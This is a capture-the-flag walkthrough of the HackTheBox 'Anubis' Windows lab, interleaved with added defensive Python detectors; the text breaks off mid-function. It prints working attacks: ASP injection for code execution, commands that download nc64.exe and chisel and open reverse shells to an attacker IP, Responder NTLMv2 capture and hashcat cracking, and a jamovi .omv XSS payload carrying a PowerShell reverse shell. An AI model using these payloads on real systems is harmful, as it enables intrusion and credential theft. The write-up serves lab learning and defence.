Summary

  • RCE in the Web application
  • Pivoting
  • Network analysis
  • Custom Exploitation
  • Domain Admin by abusing the certificate service

Scanning

┌─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $nmap -Pn -sC -sV 10.10.11.102 -oN allports.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 08:23 CET
Nmap scan report for www.windcorp.htb (10.10.11.102)
Host is up (0.28s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2022-02-23T08:40:00+00:00; +1h14m55s from scanner time.
| tls-alpn:
|_ http/1.1
|_http-title: Windcorp – Index
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=www.windcorp.htb
| Subject Alternative Name: DNS:www.windcorp.htb
| Not valid before: 2021-05-24T19:44:56
|_Not valid after: 2031-05-24T19:54:56
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-02-23T08:39:24
|_ start_date: N/A
|_clock-skew: mean: 1h14m56s, deviation: 2s, median: 1h14m54s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.27 seconds
┌─[puck@parrot-lt]─[~/htb/anubis]


Let's add www.windcorp.htb to /etc/hosts and check the web application.

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $echo "10.10.11.102 www.windcorp.htb" | sudo tee --append /etc/hosts
10.10.11.102 www.windcorp.htb

The application is static; there is only one form that looks interesting.

I will use Burp Suite to analyze the request.

GET /save.asp?name=puck&email=puck%40home.nl&subject=hoi&message=hoihoi HTTP/1.1
Host: www.windcorp.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://www.windcorp.htb/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

User input goes to the save.asp file. Can we get remote code execution?

Let's check!

I injected the message parameter with .NET code that pings me. Now I will start tcpdump to listen for ICMP.

 └─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 

BINGO!

Another way is to use:

<%
Set shell = CreateObject("WScript.Shell")
Set proc = shell.exec("whoami")
Response.Write(proc.StdOut.ReadAll)
%>

This gives the following result in Burp:

<b>Subject: </b></td><td>areyouthere</td></tr><tr><td>
<b>Message: </b></td><td>nt authority\system
</td>

The code worked and I received the ICMP requests.

 └─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:08:02.641660 IP www.windcorp.htb > 10.10.14.2: ICMP echo request, id 1000, seq 2765, length 40
11:08:02.641680 IP 10.10.14.2 > www.windcorp.htb: ICMP echo reply, id 1000, seq 2765, length 40
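As a defender's counterpart to the injection above (an added example, not code from the original post): a small Python scanner over IIS W3C log lines that URL-decodes every query string and flags the ASP delimiters and WScript.Shell/CreateObject strings a save.asp payload leaves in the server log, since the form submits by GET and the parameters land in cs-uri-query. The log excerpt, its field order (date, time, s-ip, cs-method, cs-uri-stem, cs-uri-query, c-ip) and the client addresses are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not from the original post). Assumed field
# order: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip. The second
# request carries the kind of payload the save.asp form accepted.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip
2022-02-23 10:15:01 10.10.11.102 GET /save.asp name=alice&email=alice%40example.com&subject=hello&message=thanks 10.10.14.50
2022-02-23 10:15:07 10.10.11.102 GET /save.asp name=x&email=x%40x.com&subject=t&message=%3C%25+Set+shell+%3D+CreateObject%28%22WScript.Shell%22%29+%25%3E 10.10.14.2
2022-02-23 10:15:09 10.10.11.102 GET /index.html - 10.10.14.50
"""

# Strings that have no business in a contact-form parameter of a classic ASP app.
INDICATORS = {
    "asp_delimiter": re.compile(r"<%|%>"),
    "createobject": re.compile(r"CreateObject\s*\(", re.IGNORECASE),
    "wscript_shell": re.compile(r"WScript\.Shell", re.IGNORECASE),
    "shell_exec": re.compile(r"\.exec\s*\(", re.IGNORECASE),
}


def decode_query(query):
    """URL-decode up to twice, so a double-encoded payload (%253C%2525) is exposed too."""
    for _ in range(2):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def scan_iis_log(text):
    """Return one finding per request whose decoded query matches an indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue  # blank lines and W3C directives
        parts = line.split()
        if len(parts) < 7:
            continue  # not a complete record
        _date, _time, _server_ip, _method, uri_stem, query, client_ip = parts[:7]
        decoded = decode_query(query) if query != "-" else ""
        hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if hits:
            findings.append({
                "line": lineno,
                "client": client_ip,
                "uri": uri_stem,
                "indicators": hits,
                "decoded_query": decoded,
            })
    return findings


if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} -> {f['uri']} matched {f['indicators']}")
        print("   ", f["decoded_query"])
```

Decoding twice matters: a payload sent as `%253C%2525` looks harmless in the raw log but becomes `<%` after two passes, which is what the application itself would have seen if it decoded a second time.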

Foothold

We could generate the reverse shell using revshells.

I used the payload below:

 <%
Set shell = CreateObject("WScript.Shell")
Set proc = shell.exec("powershell -c curl -outfile C:\nc64.exe http://10.10.14.2/nc64.exe; C:\nc64.exe -e powershell 10.10.14.2 443")
Response.Write(proc.StdOut.ReadAll)
%>
 

Now I need to listen on port 443 using netcat and get my reverse shell.

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $sudo nc -nlvp 443
listening on [any] 443 …
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.102] 49920
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv> whoami
whoami
nt authority\system
PS C:\windows\system32\inetsrv> hostname
hostname
webserver01
PS C:\windows\system32\inetsrv> ipconfig
ipconfig
Windows IP Configuration

Ethernet adapter vEthernet (Ethernet):

Connection-specific DNS Suffix . : htb
Link-local IPv6 Address . . . . . : fe80::c70:4d6e:2607:b2ee%32
IPv4 Address. . . . . . . . . . . : 172.18.223.176
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 172.18.208.1
PS C:\windows\system32\inetsrv>


Hmm, SYSTEM! I don't think it's that easy.

PS C:\Users> ls 


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                             
----                -------------         ------ ----                                             
d-----         4/9/2021  10:36 PM                Administrator                                    
d-----        5/25/2021  12:05 PM                ContainerAdministrator                           
d-----         4/9/2021  10:37 PM                ContainerUser                                    
d-r---         4/9/2021  10:36 PM                Public  

It’s a container.

 

Enumeration

Let's see what the Administrator has on the desktop.

 PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name                                             
----                -------------         ------ ----                                             
-a----        5/24/2021   9:36 PM            989 req.txt                                          


PS C:\Users\Administrator\Desktop> type req.txt
-----BEGIN CERTIFICATE REQUEST-----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-----END CERTIFICATE REQUEST-----

It's an SSL certificate request; let's decode it.

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $openssl req -in req.txt -noout -text
Certificate Request:
    Data:
        Version: 1 (0x0)
        Subject: C = AU, ST = Some-State, O = WindCorp, CN = softwareportal.windcorp.htb
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus:
                    00:a6:9b:4a:ff:85:91:c2:2a:c2:bf:04:3e:ce:15:
                    d2:f6:23:db:c5:f2:82:1e:6a:13:12:f4:b6:fd:b1:
                    32:44:14:24:c7:1b:10:9d:85:15:fe:c6:d8:ac:44:
                    1b:c0:00:51:0e:b8:f5:14:05:62:9b:04:41:c8:1f:
                    66:e1:18:47:c2:7a:78:48:2e:5f:fd:45:10:ae:00:
                    a2:f4:8a:e8:f6:9d:02:ab:1d:0d:43:cc:31:15:b8:
                    89:19:9d:36:a4:8f:70:3e:02:1b:d3:3e:7b:4b:78:
                    48:0d:7f:99:77:dd:c6:ce:70:72:05:9b:70:bd:db:
                    f7:1f:d8:8b:e3:1e:16:89:59:bf:b8:6b:fe:8f:81:
                    39:5c:c4:13:27:7b:93:ac:47:ee:21:73:86:08:84:
                    b9:f3:40:ca:15:52:ac:bb:c0:8d:d5:67:6b:63:4a:
                    1e:92:8a:23:d4:e3:e5:60:fe:7b:f1:ff:f6:0d:c8:
                    46:ac:de:68:c0:fc:34:99:89:cc:ec:a8:3b:c2:34:
                    cd:b8:61:93:aa:aa:65:48:c6:59:90:08:02:b8:5a:
                    ca:3b:1c:cc:21:68:a9:6e:7b:77:2e:dc:fa:45:3a:
                    ff:88:27:d6:a5:b0:d5:ad:f3:17:53:b5:51:22:a4:
                    26:70:59:13:c5:bc:61:6e:d7:1e:79:4a:fb:38:d4:
                    a7:77
                Exponent: 65537 (0x10001)
        Attributes:
            a0:00
    Signature Algorithm: sha256WithRSAEncryption
         6b:ac:75:c1:11:97:70:30:62:4c:0f:87:27:33:07:96:36:9b:
         63:91:72:c9:3a:0b:50:30:09:23:5e:f3:24:bc:46:81:51:54:
         79:5c:5d:61:ed:1b:af:d2:fd:d6:2b:3b:9a:e8:50:f1:2f:6c:
         d8:ac:b5:8b:2d:8f:59:6e:63:8a:de:cc:70:f6:7a:f0:da:e6:
         6d:8c:25:bc:d5:ac:17:ba:5c:67:b2:d8:54:6d:b8:57:9e:ec:
         21:d1:7f:33:3a:11:dc:3a:6a:3b:94:ff:0e:6f:60:37:23:ad:
         c8:a4:27:9a:13:08:a3:8d:65:d5:fd:9c:7c:57:dc:a8:c8:e9:
         5d:cc:1a:1e:2c:7b:6c:29:71:56:86:d6:a2:59:79:bf:6f:b8:
         5f:04:cf:69:a3:45:86:d6:f2:f0:0d:45:17:4f:4d:0d:2a:7c:
         67:c2:4c:c9:51:91:c7:61:6f:1a:b2:77:f6:f2:2b:8e:53:0c:
         28:58:fa:33:71:80:99:db:c7:f8:83:bf:0f:90:7a:24:21:04:
         dd:a9:ae:c5:4d:38:08:81:f0:08:8e:42:d3:84:f6:29:a0:8d:
         e1:4e:b5:d7:63:c3:21:2d:2d:3a:e6:41:8f:c8:1d:60:8b:20:
         05:8b:05:0d:e0:ed:a7:6d:e0:e0:9b:11:e9:2a:2c:12:2b:28:
         e1:39:70:a5
┌─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $

There is another subdomain (softwareportal.windcorp.htb). I added it to /etc/hosts but I couldn't reach it.

I need to establish a tunnel and forward the machine's ports to be able to open the internal web application.

Port forwarding

If you are struggling to download chisel to the machine, you can use this command:

(new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/chisel.exe','C:\users\Administrator\Desktop\chisel.exe')

Victim Machine

PS C:\users\administrator\desktop> .\chisel.exe client 10.10.14.2:8000 R:socks

.\chisel.exe client 10.10.14.2:1337 R:127.0.0.1:socks
2022/02/25 14:22:46 client: Connecting to ws://10.10.14.2:1337
2022/02/25 14:22:48 client: Connected (Latency 147.5104ms)

Attacker Machine

┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $./chisel server -p 1337 --reverse
2022/02/25 13:08:06 server: Reverse tunnelling enabled
2022/02/25 13:08:06 server: Fingerprint 2xJ5k3GohfxUHC9nrh2ELWq1sXfkn2yhUtQ2/eVwqqs=
2022/02/25 13:08:06 server: Listening on http://0.0.0.0:1337
2022/02/25 13:08:32 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening



┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $sudo proxychains crackmapexec smb 172.18.208.1
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:135-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
SMB 172.18.208.1 445 EARTH [*] Windows 10.0 Build 17763 x64 (name:EARTH) (domain:windcorp.htb) (signing:True) (SMBv1:False)
┌─[puck@parrot-lt]─[~/htb/anubis]

 

Now we need to add softwareportal.windcorp.htb to our /etc/hosts and set up the SOCKS proxy in the browser.

172.18.208.1 softwareportal.windcorp.htb

That's the container's default gateway.

The web application fetches the programs from an internal IP; let's see what is happening.

Lateral Movement

Let's analyze the request by changing the client parameter to our IP and setting up a tcpdump listener to see what is happening.

Victim Machine

PS C:\windows\system32\inetsrv> curl "http://softwareportal.windcorp.htb/install.asp?client=10.10.14.2&software=gimp-2.10.24-setup-3.exe"

Attacker Machine

└─$ sudo tcpdump -i tun0 -w logs.pcap -n        
tcpdump: listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

Let's filter the capture and start the analysis.

tcpdump -r logs.pcap | grep -v '5554' | head
reading from file logs.pcap, link-type RAW (Raw IP), snapshot length 262144
20:47:56.626363 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [SEW], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0
20:47:56.626424 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 4024374085, win 0, length 0
20:47:57.373410 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [S], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0
20:47:57.373457 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 1, win 0, length 0
20:47:58.089647 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [S], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0
20:47:58.089682 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 1, win 0, length 0
20:47:58.249260 IP 10.10.11.102.50857 > 10.10.17.76.5985: Flags [SEW], seq 2900609790, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0
20:47:58.249305 IP 10.10.14.79.5985 > 10.10.11.102.50857: Flags [R.], seq 0, ack 2900609791, win 0, length 0
20:47:59.012439 IP 10.10.11.102.50857 > 10.10.17.76.5985: Flags [S], seq 2900609790, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0
20:47:59.012486 IP 10.10.17.76.5985 > 10.10.11.102.50857: Flags [R.], seq 0, ack 1, win 0, length 0

That didn't work for me the first time; don't give up on it, keep trying.

From those logs I understood that the web application tries to authenticate over WinRM to the client address to get the file.
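The issue here is that the portal opens a WinRM session to whatever host the `client` parameter names, so the server's credentials follow the user's input. As an added example (not code from the original post), the block below shows both sides of the fix in Python: an allowlist check that such a parameter should pass before any connection is made, and a detector that reads tcpdump text like the capture above and counts initial SYNs to the WinRM ports (5985/5986) whose destination is outside the allowed ranges. The allowed ranges (the host network 10.10.11.0/24 and the container network 172.18.208.0/20) are assumptions; the capture lines are a subset of the ones above plus one constructed SYN to the container gateway.

```python
import ipaddress
import re
from collections import Counter

# Address ranges the software portal may legitimately push installs to
# (assumed here: the host network and the container network seen above).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.10.11.0/24", "172.18.208.0/20")]
WINRM_PORTS = {5985, 5986}

# Matches the "IP a.b.c.d.port > e.f.g.h.port: Flags [..]" records tcpdump prints.
TCPDUMP_RX = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)

# Records from the capture above, one per line, plus one constructed SYN to the
# container gateway to show that an allowed destination is not flagged.
SAMPLE_CAPTURE = """\
20:47:56.626363 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [SEW], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0
20:47:56.626424 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 4024374085, win 0, length 0
20:47:57.373410 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [S], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0
20:47:57.373457 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 1, win 0, length 0
20:47:58.089647 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [S], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0
20:47:58.089682 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 1, win 0, length 0
20:47:58.249260 IP 10.10.11.102.50857 > 10.10.17.76.5985: Flags [SEW], seq 2900609790, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0
20:47:59.012439 IP 10.10.11.102.50857 > 10.10.17.76.5985: Flags [S], seq 2900609790, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0
20:48:10.000000 IP 10.10.11.102.50900 > 172.18.208.1.5985: Flags [S], seq 1, win 64240, length 0
"""


def client_is_allowed(client, nets=INTERNAL_NETS):
    """Allowlist check for a user-supplied 'client' value: a literal IP inside an internal range."""
    try:
        ip = ipaddress.ip_address(client)
    except ValueError:
        return False  # hostnames, CIDR strings or junk are rejected outright
    return any(ip in net for net in nets)


def outbound_winrm_syns(capture, nets=INTERNAL_NETS):
    """Count initial SYNs to WinRM ports whose destination is outside the allowed ranges."""
    counts = Counter()
    for line in capture.splitlines():
        m = TCPDUMP_RX.match(line.strip())
        if not m:
            continue
        flags, dport = m["flags"], int(m["dport"])
        # 'S' without '.' is a plain SYN (the connection attempt); 'S.' would be the SYN-ACK.
        if dport not in WINRM_PORTS or "S" not in flags or "." in flags:
            continue
        if client_is_allowed(m["dst"], nets):
            continue
        counts[(m["src"], m["dst"], dport)] += 1
    return dict(counts)


if __name__ == "__main__":
    for (src, dst, port), n in outbound_winrm_syns(SAMPLE_CAPTURE).items():
        print(f"{src} tried WinRM to non-internal {dst}:{port} {n} times")
```

A server that initiates WinRM (or SMB, or HTTP with integrated auth) toward an address it has never talked to before is the network-side signature of this bug; the allowlist is the application-side fix, and resolving hostnames server-side does not help, so the check accepts only literal addresses.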

Escaping the Docker container

I will start Responder to catch the hash of the user that is trying to authenticate over WinRM.

sudo responder -I tun0 -v

Let's repeat the request and see what happens.

PS C:\windows\system32\inetsrv> curl "http://softwareportal.windcorp.htb/install.asp?client=10.10.14.2&software=gimp-2.10.24-setup-3.exe"

BAM!

[+] Listening for events...
[WinRM] NTLMv2 Client   : 10.10.11.102
[WinRM] NTLMv2 Username : windcorp\localadmin
[WinRM] NTLMv2 Hash     : localadmin::windcorp:5154b10fe742e26f:02D37AB30D2443EEFC13F18062985D6E:0101000000000000B574CFFAD2CDD7012A9D75CCC99D4C0D0000000002000800490053003700540001001E00570049004E002D00520031005800530059005400560035003700450034000400140049005300370054002E004C004F00430041004C0003003400570049004E002D00520031005800530059005400560035003700450034002E0049005300370054002E004C004F00430041004C000500140049005300370054002E004C004F00430041004C0008003000300000000000000000000000002100008840E4FBD0AA6E1880E61526E42DF0210E6BE2F694B85FED945A976C305BDE030A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E00370039000000000000000000

 

Let's crack it.

hashcat -m 5600 hash_localadmin /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
------------SNIP------------

LOCALADMIN::windcorp:5154b10fe742e26f:02d37ab30d2443eefc13f18062985d6e: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:Secret123

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: LOCALADMIN::windcorp:5154b10fe742e26f:02d37ab30d244...000000
Time.Started.....: Sat Oct 30 21:17:32 2021 (3 secs)
Time.Estimated...: Sat Oct 30 21:17:35 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 713.3 kH/s (2.36ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2093056/14344385 (14.59%)
Rejected.........: 0/2093056 (0.00%)
Restore.Point....: 2091008/14344385 (14.58%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Smudge4 -> SaTeLlItE
Started: Sat Oct 30 21:17:30 2021
Stopped: Sat Oct 30 21:17:37 2021
------------SNIP------------
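What Responder printed and hashcat mode 5600 consumed is the NetNTLMv2 response: `user::domain:serverchallenge:NTProofStr:blob`, where NTProofStr is an HMAC-MD5 over the server challenge and the blob, and the blob carries a FILETIME timestamp, a client challenge and the MS-NLMP TargetInfo AV pairs. As an added example (not code from the original post), the Python below builds such a blob and parses it back, which is how an incident responder reads a captured line to learn when it was issued and which server the client believed it was talking to. The user, domain, server challenge and NTProofStr are copied from the capture above, and the AV-pair strings (IS7T, WIN-R1XSYTV57E4, HTTP/10.10.14.79) and timestamp are the ones that blob contains; the blob itself is rebuilt here from those pairs rather than copied byte for byte, so it is a constructed sample.

```python
import struct
from datetime import datetime, timedelta, timezone

# MsvAv pair ids from MS-NLMP (the TargetInfo block inside an NTLMv2 response).
AV_NAMES = {
    1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
    4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags",
    7: "MsvAvTimestamp", 8: "MsvAvSingleHost", 9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
TEXT_AV = {1, 2, 3, 4, 5, 9}  # UTF-16LE strings; the rest are binary
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def build_blob(filetime, client_challenge, av_pairs):
    """Assemble an NTLMv2_CLIENT_CHALLENGE ('blob') the way a Windows client lays it out."""
    # RespType=1, HiRespType=1, Reserved1, Reserved2, TimeStamp, ChallengeFromClient, Reserved3
    out = struct.pack("<BBHIQ8sI", 1, 1, 0, 0, filetime, client_challenge, 0)
    for av_id, value in av_pairs:
        data = value.encode("utf-16-le") if av_id in TEXT_AV else value
        out += struct.pack("<HH", av_id, len(data)) + data
    return out + struct.pack("<HH", 0, 0)  # MsvAvEOL


def parse_blob(blob):
    """Decode the fixed header and walk the AV pairs until MsvAvEOL (or truncation)."""
    _rt, _hrt, _r1, _r2, filetime, client_challenge, _r3 = struct.unpack_from("<BBHIQ8sI", blob, 0)
    fields = {
        "timestamp": FILETIME_EPOCH + timedelta(microseconds=filetime // 10),
        "client_challenge": client_challenge.hex(),
        "av_pairs": {},
    }
    off = 28
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        if av_id == 0:
            break
        raw = blob[off + 4: off + 4 + av_len]
        name = AV_NAMES.get(av_id, f"MsvAv{av_id}")
        fields["av_pairs"][name] = raw.decode("utf-16-le", "replace") if av_id in TEXT_AV else raw.hex()
        off += 4 + av_len
    return fields


def parse_netntlmv2(line):
    """Split the 'user::domain:serverchallenge:ntproofstr:blob' line Responder prints."""
    user, _, domain, server_challenge, ntproofstr, blob_hex = line.strip().split(":", 5)
    fields = parse_blob(bytes.fromhex(blob_hex))
    fields.update(user=user, domain=domain, server_challenge=server_challenge, ntproofstr=ntproofstr)
    return fields


def rogue_server_indicators(fields, expected_dns_suffix):
    """Flag TargetInfo naming a server outside the expected domain: the creds went to a rogue host."""
    av = fields["av_pairs"]
    suffix = expected_dns_suffix.lower()
    issues = []
    for name in ("MsvAvDnsDomainName", "MsvAvDnsComputerName", "MsvAvDnsTreeName", "MsvAvTargetName"):
        value = av.get(name, "")
        if value and not value.lower().endswith(suffix):
            issues.append(f"{name}={value}")
    return issues


# Constructed sample mirroring the capture above (see the lead-in for what is copied).
SAMPLE_BLOB = build_blob(
    0x01D7CDD2FACF74B5,
    bytes.fromhex("2A9D75CCC99D4C0D"),
    [(2, "IS7T"), (1, "WIN-R1XSYTV57E4"), (4, "IS7T.LOCAL"),
     (3, "WIN-R1XSYTV57E4.IS7T.LOCAL"), (5, "IS7T.LOCAL"), (9, "HTTP/10.10.14.79")],
)
SAMPLE_LINE = "localadmin::windcorp:5154b10fe742e26f:02D37AB30D2443EEFC13F18062985D6E:" + SAMPLE_BLOB.hex().upper()

if __name__ == "__main__":
    parsed = parse_netntlmv2(SAMPLE_LINE)
    print(parsed["user"], parsed["domain"], parsed["timestamp"].isoformat())
    for k, v in parsed["av_pairs"].items():
        print(f"  {k} = {v}")
    print("rogue indicators:", rogue_server_indicators(parsed, "windcorp.htb"))
```

Two things in the parsed output are worth a responder's attention: the TargetInfo names a domain (IS7T.LOCAL) that does not exist in the environment, which is Responder's default fake identity, and the timestamp places the authentication on 30 October 2021 at 21:13 UTC, consistent with the hashcat session shown above.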

User

Let's enumerate SMB.

smbclient -L //10.10.11.102 -U localadmin
Enter WORKGROUP\localadmin's password: Secret123

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	CertEnroll      Disk      Active Directory Certificate Services share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Shared          Disk
	SYSVOL          Disk      Logon server share

smbclient //10.10.11.102/Shared -U localadmin
Enter WORKGROUP\localadmin's password: Secret123
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D          0  Wed Apr 28 15:06:06 2021
  ..                                  D          0  Wed Apr 28 15:06:06 2021
  Documents                           D          0  Tue Apr 27 04:09:25 2021
  Software                            D          0  Thu Jul 22 18:14:16 2021

		9034239 blocks of size 4096. 3206077 blocks available

smb: \> ls Software\
  .                                   D          0  Thu Jul 22 18:14:16 2021
  ..                                  D          0  Thu Jul 22 18:14:16 2021
  7z1900-x64.exe                      N    1447178  Mon Apr 26 21:10:08 2021
  jamovi-1.6.16.0-win64.exe           N  247215343  Mon Apr 26 21:03:30 2021
  VNC-Viewer-6.20.529-Windows.exe     N   10559784  Mon Apr 26 21:09:53 2021

		9034239 blocks of size 4096. 3206077 blocks available

smb: \> ls Documents\Analytics\
  .                                   D          0  Tue Apr 27 18:40:20 2021
  ..                                  D          0  Tue Apr 27 18:40:20 2021
  Big 5.omv                           A       6455  Tue Apr 27 18:39:20 2021
  Bugs.omv                            A       2897  Tue Apr 27 18:39:55 2021
  Tooth Growth.omv                    A       2142  Tue Apr 27 18:40:20 2021
  Whatif.omv                          A       2841  Sat Oct 30 21:49:42 2021

		9034239 blocks of size 4096. 3206077 blocks available

What is .omv? Let's search.

I searched for the latest jamovi vulnerabilities and found CVE-2021-28079.

I need to make an .omv file and inject an XSS payload to get a reverse shell.

Note: don't exhaust yourself trying to find the vulnerable version; download it from the share.

Let's unzip Whatif.omv.

 └─# unzip Whatif.omv       
  Archive:  Whatif.omv
  inflating: META-INF/MANIFEST.MF    
  inflating: index.html              
  inflating: metadata.json           
  inflating: xdata.json              
  inflating: data.bin                
  inflating: 01 empty/analysis  
  

I injected the name column as described in the previous link.


(() => {
    let sh = require('child_process');
    sh.exec("powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.17.76',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");
    return /a/;
})();

That is the reverse shell I used; make sure you save it as a .js file. Now replace the file on the server with the one we made, using SMB.
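An .omv file is a zip archive whose metadata.json carries the column names that jamovi renders, which is why a column name is where the payload goes. As an added example (not code from the original post or from the jamovi project), the Python below is a scanner a defender can run over a share like Documents\Analytics: it opens each archive, walks every string in every JSON member and reports the ones containing script tags, inline event handlers or Node.js calls such as require('child_process'). The `make_omv` helper builds a constructed archive in memory with the member names from the unzip listing above; its metadata.json layout is an assumption the scanner does not depend on.

```python
import io
import json
import re
import zipfile

# Markup or Node.js calls that must never appear in a data file's metadata strings.
SUSPICIOUS = [re.compile(p, re.IGNORECASE) for p in (
    r"<\s*script\b", r"<\s*\w+[^>]*\son\w+\s*=", r"javascript:", r"require\s*\(", r"child_process")]


def iter_strings(obj, path="$"):
    """Yield (json_path, value) for every string anywhere in a parsed JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from iter_strings(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
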